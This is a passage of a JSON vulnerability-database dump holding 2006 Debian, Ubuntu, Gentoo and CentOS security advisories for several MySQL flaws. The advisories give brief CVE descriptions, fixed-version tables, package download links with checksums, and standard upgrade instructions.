cb0be5d5ff7180c0e36850a69a5159c6\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-client-4.1_4.1.11a-4sarge3_powerpc.deb\n Size/MD5 checksum: 906982 23b1bb52a6df22e84f3677e3eec0c0b4\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-server-4.1_4.1.11a-4sarge3_powerpc.deb\n Size/MD5 checksum: 15402586 2af7f90038dbb3f60cc1c62c159ff18e\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysqlclient14_4.1.11a-4sarge3_s390.deb\n Size/MD5 checksum: 1538088 68fd210fd6eb741baa8ae48540ce696c\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysqlclient14-dev_4.1.11a-4sarge3_s390.deb\n Size/MD5 checksum: 5461222 0734f9fec16ab4b2aa96bc53fb68fdae\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-client-4.1_4.1.11a-4sarge3_s390.deb\n Size/MD5 checksum: 883848 4cf9f929345df7259c78b731a8eda589\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-server-4.1_4.1.11a-4sarge3_s390.deb\n Size/MD5 checksum: 15055130 883b34ff52b3fffdf62845cabe5a99c4\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysqlclient14_4.1.11a-4sarge3_sparc.deb\n Size/MD5 checksum: 1460258 513bb61a8a20c6eb55722b37a21010eb\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/libmysqlclient14-dev_4.1.11a-4sarge3_sparc.deb\n Size/MD5 checksum: 6207684 b6191cb684d4d7057d5577840d932d6d\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-client-4.1_4.1.11a-4sarge3_sparc.deb\n Size/MD5 checksum: 867786 a695ec3e218569ce84ad39413e113123\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-4.1/mysql-server-4.1_4.1.11a-4sarge3_sparc.deb\n Size/MD5 checksum: 15391404 79c1c0e272f8f21b9b72486945104400\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;\n\n", "edition": 9, "modified": "2006-05-22T00:00:00", "published": "2006-05-22T00:00:00", "id": "DEBIAN:DSA-1073-1:5FA93", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00159.html", "title": "[SECURITY] [DSA 1073-1] New MySQL 4.1 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-11-11T13:19:05", "bulletinFamily": "unix", "cvelist": ["CVE-2006-1517", "CVE-2006-0903", "CVE-2006-1518", "CVE-2006-1516"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1079-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nMay 29th, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : mysql-dfsg\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE IDs : CVE-2006-0903 CVE-2006-1516 CVE-2006-1517 CVE-2006-1518\nCERT advisory : VU#602457\nBugTraq IDs : 16850 17780\nDebian Bugs : 366044 366049 366163\n\nSeveral vulnerabilities have been discovered in MySQL, a popular SQL\ndatabase. The Common Vulnerabilities and Exposures Project identifies\nthe following problems:\n\nCVE-2006-0903\n\n Improper handling of SQL queries containing the NULL character\n allow local users to bypass logging mechanisms.\n\nCVE-2006-1516\n\n Usernames without a trailing null byte allow remote attackers to\n read portions of memory.\n\nCVE-2006-1517\n\n A request with an incorrect packet length allows remote attackers\n to obtain sensitive information.\n\nCVE-2006-1518\n\n Specially crafted request packets with invalid length values allow\n the execution of arbitrary code.\n\nThe following vulnerability matrix shows which version of MySQL in\nwhich distribution has this problem fixed:\n\n woody sarge sid\nmysql 3.23.49-8.15 n/a n/a\nmysql-dfsg n/a 4.0.24-10sarge2 n/a\nmysql-dfsg-4.1 n/a 4.1.11a-4sarge3 n/a\nmysql-dfsg-5.0 n/a n/a 5.0.21-3\n\nWe recommend that you upgrade your mysql packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-dfsg_4.0.24-10sarge2.dsc\n Size/MD5 checksum: 966 42f14bb83f832f0f88bdabb317f62df8\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-dfsg_4.0.24-10sarge2.diff.gz\n Size/MD5 checksum: 98938 9aaf7d794c14faa63a05d7630f683383\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-dfsg_4.0.24.orig.tar.gz\n Size/MD5 checksum: 9923794 aed8f335795a359f32492159e3edfaa3\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-common_4.0.24-10sarge2_all.deb\n Size/MD5 checksum: 34566 f4aa726f5f9ec79e42799a40faabcf17\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/libmysqlclient12_4.0.24-10sarge2_alpha.deb\n Size/MD5 checksum: 356730 97904c2a773bc61c643e4dce283a2862\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/libmysqlclient12-dev_4.0.24-10sarge2_alpha.deb\n Size/MD5 checksum: 4533478 8edafbc553d062864c4bb17cbca3211b\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-client_4.0.24-10sarge2_alpha.deb\n Size/MD5 checksum: 520712 5883aef348e2eb1321b21051cdd604be\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-server_4.0.24-10sarge2_alpha.deb\n Size/MD5 checksum: 4890620 824e4c4c078ef73612fccbea7e209651\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/libmysqlclient12_4.0.24-10sarge2_amd64.deb\n Size/MD5 checksum: 309490 c7943142f1f618987c87073c5893174e\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/libmysqlclient12-dev_4.0.24-10sarge2_amd64.deb\n Size/MD5 checksum: 3182676 e62cc19620500c5430447978b7e645c6\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-client_4.0.24-10sarge2_amd64.deb\n Size/MD5 checksum: 434022 55e3f43e8ac136951fc1b679df820cd1\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-server_4.0.24-10sarge2_amd64.deb\n Size/MD5 checksum: 3878414 5ab561357abca1720b9942c9f8e78a4e\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/libmysqlclient12_4.0.24-10sarge2_arm.deb\n Size/MD5 checksum: 288180 6869739c00a8151a181ec8cfffe1ec70\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/libmysqlclient12-dev_4.0.24-10sarge2_arm.deb\n Size/MD5 checksum: 2848430 945158edc0fba528a04f98170fe55921\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-client_4.0.24-10sarge2_arm.deb\n Size/MD5 checksum: 414176 8ecea50cf576d50bd5ceb6424915da52\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-server_4.0.24-10sarge2_arm.deb\n Size/MD5 checksum: 3482538 ae6cb51798ea91d7b6009dcd80a55e43\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/libmysqlclient12_4.0.24-10sarge2_i386.deb\n Size/MD5 checksum: 296570 7cdd0f7a094215ab98249514031ef9a0\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/libmysqlclient12-dev_4.0.24-10sarge2_i386.deb\n Size/MD5 checksum: 2922132 84cffb8467493bcf0cf49ef3a21caa67\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-client_4.0.24-10sarge2_i386.deb\n Size/MD5 checksum: 415162 7bb2bfd6b9853d51abbf958eeed5b23f\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-server_4.0.24-10sarge2_i386.deb\n Size/MD5 checksum: 3645982 b2d2991bee2e019a45cbaa39fa7e9f6b\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/libmysqlclient12_4.0.24-10sarge2_ia64.deb\n Size/MD5 checksum: 395396 b03b6af8b0e21c8e80bbc8d2ef5c7817\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/libmysqlclient12-dev_4.0.24-10sarge2_ia64.deb\n Size/MD5 checksum: 4472590 aa5afd6648c2034fd0d254100e2e42fc\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-client_4.0.24-10sarge2_ia64.deb\n Size/MD5 checksum: 562984 e357eebc432a81d9f8f4c94f365528d4\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-server_4.0.24-10sarge2_ia64.deb\n Size/MD5 checksum: 5328582 1f528438e2282f4b51c13932d70875fd\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/libmysqlclient12_4.0.24-10sarge2_hppa.deb\n Size/MD5 checksum: 329948 864b11f30e86d7d2921caeda238f22f9\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/libmysqlclient12-dev_4.0.24-10sarge2_hppa.deb\n Size/MD5 checksum: 3314390 12c74247254b89c93dc5aecf74c3249f\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-client_4.0.24-10sarge2_hppa.deb\n Size/MD5 checksum: 456078 cf903d0dcb745d67f4ad66ad3a4b66f2\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-server_4.0.24-10sarge2_hppa.deb\n Size/MD5 checksum: 3947304 f8feb350cc9a6db2979d215ea6735bda\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/libmysqlclient12_4.0.24-10sarge2_m68k.deb\n Size/MD5 checksum: 279504 9a202261b9627190d15ab5bb7e98d0e2\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/libmysqlclient12-dev_4.0.24-10sarge2_m68k.deb\n Size/MD5 checksum: 2665612 e49f8b011912473604c9df82047fd244\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-client_4.0.24-10sarge2_m68k.deb\n Size/MD5 checksum: 390304 d04f65d12c590a0239408e3293c80714\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-server_4.0.24-10sarge2_m68k.deb\n Size/MD5 checksum: 3293046 8a049030853d08742488a1e4dabc504d\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/libmysqlclient12_4.0.24-10sarge2_mips.deb\n Size/MD5 checksum: 314170 41c279180276fcf8effa8573fe75a158\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/libmysqlclient12-dev_4.0.24-10sarge2_mips.deb\n Size/MD5 checksum: 3182296 f9fe3b82095434f04871092f1431d2d1\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-client_4.0.24-10sarge2_mips.deb\n Size/MD5 checksum: 457290 19243ed43a65f65a3dee76657274f365\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-server_4.0.24-10sarge2_mips.deb\n Size/MD5 checksum: 3813374 f71b04ee43e3629dd410dd72e0d1ac15\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/libmysqlclient12_4.0.24-10sarge2_mipsel.deb\n Size/MD5 checksum: 313862 ae441e9b7d18e9f5b16a01243f8a292b\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/libmysqlclient12-dev_4.0.24-10sarge2_mipsel.deb\n Size/MD5 checksum: 3170026 7fdcb95df46e805c350d1035e5e3534e\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-client_4.0.24-10sarge2_mipsel.deb\n Size/MD5 checksum: 457296 fe2c3473cbcf10cbacb4a9606a8b285a\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-server_4.0.24-10sarge2_mipsel.deb\n Size/MD5 checksum: 3800380 db0f0b418fb92dd9978fe75df5356fef\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/libmysqlclient12_4.0.24-10sarge2_powerpc.deb\n Size/MD5 checksum: 315104 3f28badbf686cbff4a4905bdc507e31d\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/libmysqlclient12-dev_4.0.24-10sarge2_powerpc.deb\n Size/MD5 checksum: 3184308 8c986e6f386b84f960894575e557c6b7\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-client_4.0.24-10sarge2_powerpc.deb\n Size/MD5 checksum: 464662 d48488660fc50361bdb58dc446a67b89\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-server_4.0.24-10sarge2_powerpc.deb\n Size/MD5 checksum: 3842406 902b6725bcbf405d723f3bdb1f86b52b\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/libmysqlclient12_4.0.24-10sarge2_s390.deb\n Size/MD5 checksum: 324700 5e52e1cc8b4781dd510c0c36e54cef11\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/libmysqlclient12-dev_4.0.24-10sarge2_s390.deb\n Size/MD5 checksum: 2830282 e6dd53a143318bb922716105e9be4131\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-client_4.0.24-10sarge2_s390.deb\n Size/MD5 checksum: 442420 41c28b4e3e625278b6231be2c254e75c\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-server_4.0.24-10sarge2_s390.deb\n Size/MD5 checksum: 3665834 d8283a9161d27bec024d5f24822847ae\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/libmysqlclient12_4.0.24-10sarge2_sparc.deb\n Size/MD5 checksum: 304688 6e3e90483f30e8c1e002594b69bbd7f9\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/libmysqlclient12-dev_4.0.24-10sarge2_sparc.deb\n Size/MD5 checksum: 3270002 eb343d64b0e0b4d0c2f6f2197148f3e9\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-client_4.0.24-10sarge2_sparc.deb\n Size/MD5 checksum: 430014 568bcb494e04f9e47e419a9cc7a7c49b\n http://security.debian.org/pool/updates/main/m/mysql-dfsg/mysql-server_4.0.24-10sarge2_sparc.deb\n Size/MD5 checksum: 3821652 2714c3d57dd30d1ef31951d452660f7c\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;\n\n", "edition": 7, "modified": "2006-05-29T00:00:00", "published": "2006-05-29T00:00:00", "id": "DEBIAN:DSA-1079-1:FCFFC", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00165.html", "title": "[SECURITY] [DSA 1079-1] New MySQL 4.0 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-11-11T13:30:57", "bulletinFamily": "unix", "cvelist": ["CVE-2006-1517", "CVE-2006-0903", "CVE-2006-1518", "CVE-2006-1516"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1071-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nMay 22nd, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : mysql\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE IDs : CVE-2006-0903 CVE-2006-1516 CVE-2006-1517 CVE-2006-1518\nBugTraq ID : 16850 17780\nDebian Bugs : 366044 366049 366163 \n\nSeveral vulnerabilities have been discovered in MySQL, a popular SQL\ndatabase. The Common Vulnerabilities and Exposures Project identifies\nthe following problems:\n\nCVE-2006-0903\n\n Improper handling of SQL queries containing the NULL character\n allow local users to bypass logging mechanisms.\n\nCVE-2006-1516\n\n Usernames without a trailing null byte allow remote attackers to\n read portions of memory.\n\nCVE-2006-1517\n\n A request with an incorrect packet length allows remote attackers\n to obtain sensitive information.\n\nCVE-2006-1518\n\n Specially crafted request packets with invalid length values allow\n the execution of arbitrary code.\n\nThe following vulnerability matrix shows which version of MySQL in\nwhich distribution has this problem fixed:\n\n woody sarge sid\nmysql 3.23.49-8.15 n/a n/a\nmysql-dfsg n/a 4.0.24-10sarge2 n/a\nmysql-dfsg-4.1 n/a 4.1.11a-4sarge3 n/a\nmysql-dfsg-5.0 n/a n/a 5.0.21-3\n\nWe recommend that you upgrade your mysql packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/m/mysql/mysql_3.23.49-8.15.dsc\n Size/MD5 checksum: 879 21598d431082835b54d38a38c4cee858\n http://security.debian.org/pool/updates/main/m/mysql/mysql_3.23.49-8.15.diff.gz\n Size/MD5 checksum: 88097 f3c76dbd7c85581fa5475cf79c03d5f8\n http://security.debian.org/pool/updates/main/m/mysql/mysql_3.23.49.orig.tar.gz\n Size/MD5 checksum: 11861035 a2820d81997779a9fdf1f4b3c321564a\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/m/mysql/mysql-common_3.23.49-8.15_all.deb\n Size/MD5 checksum: 18728 4787fb8d534fccc0a75eef9886d653d1\n http://security.debian.org/pool/updates/main/m/mysql/mysql-doc_3.23.49-8.5_all.deb\n Size/MD5 checksum: 1962992 a4cacebaadf9d5988da0ed1a336b48e6\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql/libmysqlclient10_3.23.49-8.15_alpha.deb\n Size/MD5 checksum: 280046 0fcc437bffad77818f655f3d7bc08172\n http://security.debian.org/pool/updates/main/m/mysql/libmysqlclient10-dev_3.23.49-8.15_alpha.deb\n Size/MD5 checksum: 781772 0805f9a947df42ceabcf7b5416313e5d\n http://security.debian.org/pool/updates/main/m/mysql/mysql-client_3.23.49-8.15_alpha.deb\n Size/MD5 checksum: 165452 38ea22176049a8e13ce3b5116d35b102\n http://security.debian.org/pool/updates/main/m/mysql/mysql-server_3.23.49-8.15_alpha.deb\n Size/MD5 checksum: 3637800 fa1cc6d356b0547eca7971a2bf59392f\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql/libmysqlclient10_3.23.49-8.15_arm.deb\n Size/MD5 checksum: 240550 b431eb6813bf479a158c5b907e1d7c70\n http://security.debian.org/pool/updates/main/m/mysql/libmysqlclient10-dev_3.23.49-8.15_arm.deb\n Size/MD5 checksum: 637232 9e7a5f1cbeda0a88e87490e13334d01f\n http://security.debian.org/pool/updates/main/m/mysql/mysql-client_3.23.49-8.15_arm.deb\n Size/MD5 checksum: 125784 be0adbfab6226363a69528e5f1e9f333\n http://security.debian.org/pool/updates/main/m/mysql/mysql-server_3.23.49-8.15_arm.deb\n Size/MD5 checksum: 2809700 73b8ef668254a7ba6ceb2feff4b540d9\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql/libmysqlclient10_3.23.49-8.15_i386.deb\n Size/MD5 checksum: 236716 fa80e65e6efb9a1f01f2832a82f9f905\n http://security.debian.org/pool/updates/main/m/mysql/libmysqlclient10-dev_3.23.49-8.15_i386.deb\n Size/MD5 checksum: 578846 959e7c46425a7454f7fe0b198b40762e\n http://security.debian.org/pool/updates/main/m/mysql/mysql-client_3.23.49-8.15_i386.deb\n Size/MD5 checksum: 124372 597d974c2470682b0f1de92271fdabbd\n http://security.debian.org/pool/updates/main/m/mysql/mysql-server_3.23.49-8.15_i386.deb\n Size/MD5 checksum: 2802762 82fb998296316b7226d1f850eaa273a8\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql/libmysqlclient10_3.23.49-8.15_ia64.deb\n Size/MD5 checksum: 317344 3d6a459ab7e69b4f0750a59a2d094758\n http://security.debian.org/pool/updates/main/m/mysql/libmysqlclient10-dev_3.23.49-8.15_ia64.deb\n Size/MD5 checksum: 851348 c8e69d70baf65b1a4fbbb73bf00632a1\n http://security.debian.org/pool/updates/main/m/mysql/mysql-client_3.23.49-8.15_ia64.deb\n Size/MD5 checksum: 175632 796a940396042f2bcaddea018ede0d51\n http://security.debian.org/pool/updates/main/m/mysql/mysql-server_3.23.49-8.15_ia64.deb\n Size/MD5 checksum: 4002688 67622e35054325460cdd6394a9e4dfc8\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql/libmysqlclient10_3.23.49-8.15_hppa.deb\n Size/MD5 checksum: 282948 29bc465081e3f6dec23d03a13f75398a\n http://security.debian.org/pool/updates/main/m/mysql/libmysqlclient10-dev_3.23.49-8.15_hppa.deb\n Size/MD5 checksum: 746560 4fd1b58b087205fe1765ad9a51f93a8e\n http://security.debian.org/pool/updates/main/m/mysql/mysql-client_3.23.49-8.15_hppa.deb\n Size/MD5 checksum: 142410 6d5e857627d9bda09f5ae17a1fe13c8b\n http://security.debian.org/pool/updates/main/m/mysql/mysql-server_3.23.49-8.15_hppa.deb\n Size/MD5 checksum: 3516934 db9c3c9c1cec3fac8b7001bdd9faf35a\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql/libmysqlclient10_3.23.49-8.15_m68k.deb\n Size/MD5 checksum: 229876 c003c14ea7a782d36a2bbc236833233e\n http://security.debian.org/pool/updates/main/m/mysql/libmysqlclient10-dev_3.23.49-8.15_m68k.deb\n Size/MD5 checksum: 559992 b7d8bac43dbe0beafc7144ed86d6e5ac\n http://security.debian.org/pool/updates/main/m/mysql/mysql-client_3.23.49-8.15_m68k.deb\n Size/MD5 checksum: 120210 7581609f153cf2ac84a21bb29f764a78\n http://security.debian.org/pool/updates/main/m/mysql/mysql-server_3.23.49-8.15_m68k.deb\n Size/MD5 checksum: 2649814 51d9886ff911f0759f31fec56caab4c1\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql/libmysqlclient10_3.23.49-8.15_mips.deb\n Size/MD5 checksum: 253148 70974b32fbed73a10eaccebfad27ad6a\n http://security.debian.org/pool/updates/main/m/mysql/libmysqlclient10-dev_3.23.49-8.15_mips.deb\n Size/MD5 checksum: 691458 f03714859bb5e48357dee35f1cbd4825\n http://security.debian.org/pool/updates/main/m/mysql/mysql-client_3.23.49-8.15_mips.deb\n Size/MD5 checksum: 135674 efc3f06dd8a7251d931eacce61300011\n http://security.debian.org/pool/updates/main/m/mysql/mysql-server_3.23.49-8.15_mips.deb\n Size/MD5 checksum: 2852048 6bc57fb54a11f7f3940d72b2a2692ec5\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql/libmysqlclient10_3.23.49-8.15_mipsel.deb\n Size/MD5 checksum: 252828 b8f8b9a9eec8937f6b8affc4adc27613\n http://security.debian.org/pool/updates/main/m/mysql/libmysqlclient10-dev_3.23.49-8.15_mipsel.deb\n Size/MD5 checksum: 690894 ba822c97fbb74a3eb4d12fc6cbb6f1b4\n http://security.debian.org/pool/updates/main/m/mysql/mysql-client_3.23.49-8.15_mipsel.deb\n Size/MD5 checksum: 136026 d0ab4e4118754fd62abfed7de2d657de\n http://security.debian.org/pool/updates/main/m/mysql/mysql-server_3.23.49-8.15_mipsel.deb\n Size/MD5 checksum: 2841334 ce1ac81fed6b0866c27421ce8762cd56\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql/libmysqlclient10_3.23.49-8.15_powerpc.deb\n Size/MD5 checksum: 249906 6a8e1eabc665780bef0cfcd02f80bd40\n http://security.debian.org/pool/updates/main/m/mysql/libmysqlclient10-dev_3.23.49-8.15_powerpc.deb\n Size/MD5 checksum: 655160 683b9da469a9fbf322070fd14d604620\n http://security.debian.org/pool/updates/main/m/mysql/mysql-client_3.23.49-8.15_powerpc.deb\n Size/MD5 checksum: 131254 9caa84083ac02d3f42e8db1b01f335a6\n http://security.debian.org/pool/updates/main/m/mysql/mysql-server_3.23.49-8.15_powerpc.deb\n Size/MD5 checksum: 2826740 9aae136488c4a46027f2e873d530e588\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql/libmysqlclient10_3.23.49-8.15_s390.deb\n Size/MD5 checksum: 252176 40e38e7ead56c32e9bb97623525bf637\n http://security.debian.org/pool/updates/main/m/mysql/libmysqlclient10-dev_3.23.49-8.15_s390.deb\n Size/MD5 checksum: 610058 f5fdde465807c3fb1158013d2b78efce\n http://security.debian.org/pool/updates/main/m/mysql/mysql-client_3.23.49-8.15_s390.deb\n Size/MD5 checksum: 128222 2def1019311f8c90d5be16f34f1c1a0b\n http://security.debian.org/pool/updates/main/m/mysql/mysql-server_3.23.49-8.15_s390.deb\n Size/MD5 checksum: 2694420 85e5072479f5eb881d94465b47ff25a1\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/m/mysql/libmysqlclient10_3.23.49-8.15_sparc.deb\n Size/MD5 checksum: 243122 362233b968a81c7e6c5dc3d5f150ee47\n http://security.debian.org/pool/updates/main/m/mysql/libmysqlclient10-dev_3.23.49-8.15_sparc.deb\n Size/MD5 checksum: 618384 a246d3b87d68ab7ad7c50a81fd9a7323\n http://security.debian.org/pool/updates/main/m/mysql/mysql-client_3.23.49-8.15_sparc.deb\n Size/MD5 checksum: 132200 fd8be426a84c6657d1c5e2591196e1d8\n http://security.debian.org/pool/updates/main/m/mysql/mysql-server_3.23.49-8.15_sparc.deb\n Size/MD5 checksum: 2943524 403784da03722d525674901acdea685a\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;\n\n", "edition": 9, "modified": "2006-05-22T00:00:00", "published": "2006-05-22T00:00:00", "id": "DEBIAN:DSA-1071-1:F1DE3", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00157.html", "title": "[SECURITY] [DSA 1071-1] New MySQL 3.23 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-09T19:46:55", "bulletinFamily": "unix", "cvelist": ["CVE-2006-1517", "CVE-2006-1516"], "description": "Stefano Di Paola discovered an information leak in the login packet \nparser. By sending a specially crafted malformed login packet, a \nremote attacker could exploit this to read a random piece of memory, \nwhich could potentially reveal sensitive data. (CVE-2006-1516)\n\nStefano Di Paola also found a similar information leak in the parser \nfor the COM_TABLE_DUMP request. (CVE-2006-1517)", "edition": 5, "modified": "2006-05-08T00:00:00", "published": "2006-05-08T00:00:00", "id": "USN-283-1", "href": "https://ubuntu.com/security/notices/USN-283-1", "title": "MySQL vulnerabilities", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:49", "bulletinFamily": "unix", "cvelist": ["CVE-2006-1517", "CVE-2006-1516"], "edition": 1, "description": "### Background\n\nMySQL is a popular multi-threaded, multi-user SQL database server. \n\n### Description\n\nThe processing of the COM_TABLE_DUMP command by a MySQL server fails to properly validate packets that arrive from the client via a network socket. \n\n### Impact\n\nBy crafting specific malicious packets an attacker could gather confidential information from the memory of a MySQL server process, for example results of queries by other users or applications. By using PHP code injection or similar techniques it would be possible to exploit this flaw through web applications that use MySQL as a database backend. \n\nNote that on 5.x versions it is possible to overwrite the stack and execute arbitrary code with this technique. Users of MySQL 5.x are urged to upgrade to the latest available version. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll MySQL users should upgrade to the latest version. \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-db/mysql-4.0.27\"", "modified": "2006-05-15T00:00:00", "published": "2006-05-11T00:00:00", "id": "GLSA-200605-13", "href": "https://security.gentoo.org/glsa/200605-13", "type": "gentoo", "title": "MySQL: Information leakage", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "centos": [{"lastseen": "2019-12-20T18:24:56", "bulletinFamily": "unix", "cvelist": ["CVE-2006-1517", "CVE-2006-3081", "CVE-2006-0903", "CVE-2006-2753", "CVE-2006-4380", "CVE-2006-1516"], "description": "**CentOS Errata and Security Advisory** CESA-2006:0544\n\n\nMySQL is a multi-user, multi-threaded SQL database server. MySQL is a\r\nclient/server implementation consisting of a server daemon 